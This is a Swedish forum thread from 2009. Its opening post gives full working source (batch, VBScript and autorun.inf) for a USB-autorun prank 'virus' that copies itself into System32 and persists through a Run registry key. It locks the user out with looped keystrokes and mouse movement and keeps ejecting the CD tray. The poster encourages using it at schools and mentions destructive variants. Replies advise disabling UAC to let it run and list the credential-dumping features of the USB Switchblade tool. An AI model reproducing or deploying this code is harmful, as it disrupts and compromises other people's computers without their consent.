2009-01-04, 16:27
  #1
Medlem
LilaPingvins avatar
Jag fick tråkigt innan idag så jag bestämde mig för att göra ett "virus" i .bat & .vbs format.
Det fungerar på följande sätt:
.bat filen startas varje gång du sätter in USB-minnet i en dator via en Autorun som kommer finnas på ditt USB-minne.
.bat filen extraherar därefter 2 st .vbs filer till din system32 mapp och gör så att du inte kan röra din mus så att inte denna process avbryts,
den första .vbs filen kommer göra så att en nyckel i registret läggs till så att denna fil kommer startas varje gång man startar datorn i normalt läge och även starta den andra .vbs filen samtidigt, Den kommer även göra så att lamporna på ditt tangentbor blinkar och musen kommer flyttas till höger nedre hörn, enter knappen, backspace knappen och ESC trycks samtidigt ner vilket gör att det är omöjligt att byta fönster eller starta aktivitetshanteraren.
den andra .vbs filen gör så att din cd-spelare öppnas och stängs hela tiden.
Man kan lägga till så att den raderar viktiga system filer som krävs vid uppstart, men det är för destruktivit och jag kommer inte lägga upp sådana filer, men jag kommer lägga upp till er koderna till självaste "viruset".
Jag tar inget ansvar på saker som kan förstöras eller liknande, Ni får sprida/kopiera det hur ni vill, men gör det helst inte till personer som är väldigt seriösa och har lätt för att bli arga, Ni vill väll inte få ett "formaterings" virus i ansiktet?

datacab.bat
Kod:
@ECHO OFF
COPY datacab.vbs C:\Windows\System32
COPY datacab2.vbs C:\Windows\System32
START C:\Windows\System32\datacab.vbs
:MOUSE
RUNDLL32 user32.dll,SetCursorPos
GOTO MOUSE

datacab.vbs
Kod:
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Datacab" , "C:\Windows\System32\datacab.vbs" , "REG_SZ"  
WshShell.Run "C:\Windows\System32\datacab2.vbs"
do
wscript.sleep 100
WshShell.SendKeys "{BS}"
WshShell.SendKeys "~"
WshShell.SendKeys "{CAPSLOCK}"
WshShell.SendKeys "{SCROLLLOCK}"
WshShell.SendKeys "{NUMLOCK}"
WshShell.SendKeys "{ESC}"
loop

datacab2.vbs
Kod:
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
loop

autorun.inf
Kod:
[autorun]
open=datacab.bat
action=USB Of Disaster
icon=HAL-9000.ico
label=USB Of Disaster

Ni kan ladda ner en snygg icon här: http://www.iconarchive.com/download/icon/zyotism/2001-space-odyssey/HAL-9000.ico

Lägg den i samma mapp som dom andra filerna och se till så ingen heter t.ex. datacab.vbs.txt elr ngt liknande, dom ska heta datacab.vbs endast.
Tänk på att filerna MÅSTE ligga i root på ditt usb! (med andra ord direkt i USBn, inte i någon undermapp), Låt det roliga börja

För att stänga av eller ta bort, starta i felsäkert läge och radera:
C:\Windows\System32\datacab.vbs
C:\Windows\System32\datacab2.vbs
och sen gå till Start > Kör > Regedit > HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run > Radera "Datacab".
Voilá!
Citera
2009-01-04, 17:33
  #2
Medlem
Rynes avatar
USB Switchblade är ju mycket bättre:
Kod:
    * U3 Launchpad menu
    * The Payload
    * Dump System Info
    * Dump Network Services
    * Dump Port Scan
    * Dump Product Keys
    * Dump SAM (Via PWDump or FGDump)
    * Dump Wifi Hex
    * Dump Network Passwords
    * Dump Cache
    * Dump Messenger Passwords
    * Dump Firefox Passwords
    * Dump IE Passwords
    * Dump Mail Passwords
    * Dump LSA secrets
    * Dump Updates-List
    * Dump URL History
    * Dump External IP (to the log file)
    * Install HakSaw
    * Install VNC 

http://wiki.hak5.org/wiki/USB_Switchblade
Citera
2009-01-04, 23:02
  #3
Medlem
ÅnkelGunnars avatar
Citat:
Ursprungligen postat av LilaPingvin
Jag fick tråkigt innan idag så jag bestämde mig för att göra ett "virus" i .bat & .vbs format.

*** SNIPP ***

Voilá!
Funkar inte. UAC dyker upp i Vista och säger till att det här nog är dumt...
Citera
2009-01-05, 13:14
  #4
Medlem
LilaPingvins avatar
Detta "virus" är gjort på bara några minuter och är inte särskilt avancerat, det är gjort för att fungera på Windows XP dessutom och vill du bli av med UAC skiten gå till kör > msconfig > Tools > Disable UAC.
Vet inte om det är samma på den svenska Vista men den är så på engelska Vista iaf

[EDIT] Så långt som jag kan se med USB Switchblade så tar den bara information så tyst som möjligt.. Mitt "virus" skapades för att irritera folk och genom att lägga till 2 rader, för att vara så tyst och destruktiv som möjligt..
__________________
Senast redigerad av LilaPingvin 2009-01-05 kl. 13:19.
Citera
2009-01-05, 13:55
  #5
Medlem
ÅnkelGunnars avatar
Citat:
Ursprungligen postat av LilaPingvin
Detta "virus" är gjort på bara några minuter och är inte särskilt avancerat, det är gjort för att fungera på Windows XP dessutom och vill du bli av med UAC skiten gå till kör > msconfig > Tools > Disable UAC.
Vet inte om det är samma på den svenska Vista men den är så på engelska Vista iaf
Så för att få ditt 'virus' att kunna hitta på hyss måste jag först gå in och stänga av säkerhetsfunktioner i Vista? Att inte fler som gör virus tänker så och skickar med en readme för hur man stänger av sitt antivirusprogram.
Och nä, jag har inga planer på att inaktivera UAC. Det fungerar bra hos mig, stör mig inte nämnvärt och känns som en rätt bra idé.
Citera
2009-01-05, 14:54
  #6
Medlem
LilaPingvins avatar
Hahha xD Nej :P Viruset är gjort för XP där dom flesta virus program inte reagerar på detta :P Vista har massa inbyggda funktioner för att motverka just detta med autostart :P
Och somsagt det var bara ett snabbt skrevet virus och inte så avancerat
Det kan vara kul på skolor där man inte har något virusprogram och man har XP eller 98
Citera
2009-01-05, 15:06
  #7
Medlem
Uber0ns avatar
Citat:
Ursprungligen postat av ÅnkelGunnar
Och nä, jag har inga planer på att inaktivera UAC. Det fungerar bra hos mig, stör mig inte nämnvärt och känns som en rätt bra idé.
Jag håller med om att det känns som en bra idé, som tyvärr genomfördes på fel sätt.

När rutorna poppar upp stup i kvarten slutar man ju i princip att läsa dem innan man accepterar programmen som vill köras (jag kanske är lat, men jag tror inte jag är ensam om att störa mig på UAC)
Citera
2009-01-05, 15:36
  #8
Medlem
ÅnkelGunnars avatar
Citat:
Ursprungligen postat av Uber0n
Jag håller med om att det känns som en bra idé, som tyvärr genomfördes på fel sätt.

När rutorna poppar upp stup i kvarten slutar man ju i princip att läsa dem innan man accepterar programmen som vill köras (jag kanske är lat, men jag tror inte jag är ensam om att störa mig på UAC)
Jag störde mig en del på UAC i början, men efter ett tag lärde jag mig hur det är tänkt att funka, och varför det beter sig som det gör. Då är det lättare att leva med. Det är egentligen bara en sak som funkar riktigt kasst, och det är när filsystemet vägrar byta ägare på filer och kastaloger.
Citera
2009-01-06, 11:14
  #9
Medlem
LilaPingvins avatar
UAC och att Vista tar så mycket kraft på datorn var anledning till att jag bytte tillbaka till Windows XP, en annan anledning är också att när jag testade Vista var det inte kompatibelt med så många saker och att det var för mycket nya saker i systemet och att några commands hade ändrats, så jag håller mig till gamla goda XP
Lite OT men endå
Hoppas det finns folk som vill göra något kul på sin skola
__________________
Senast redigerad av LilaPingvin 2009-01-06 kl. 11:28.
Citera
2009-01-17, 14:35
  #10
Bannlyst
Citat:
Ursprungligen postat av LilaPingvin
UAC och att Vista tar så mycket kraft på datorn var anledning till att jag bytte tillbaka till Windows XP, en annan anledning är också att när jag testade Vista var det inte kompatibelt med så många saker och att det var för mycket nya saker i systemet och att några commands hade ändrats, så jag håller mig till gamla goda XP
Lite OT men endå
Hoppas det finns folk som vill göra något kul på sin skola

Jag gör hellre egna program i AHK för samma ändamål.
Citera

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in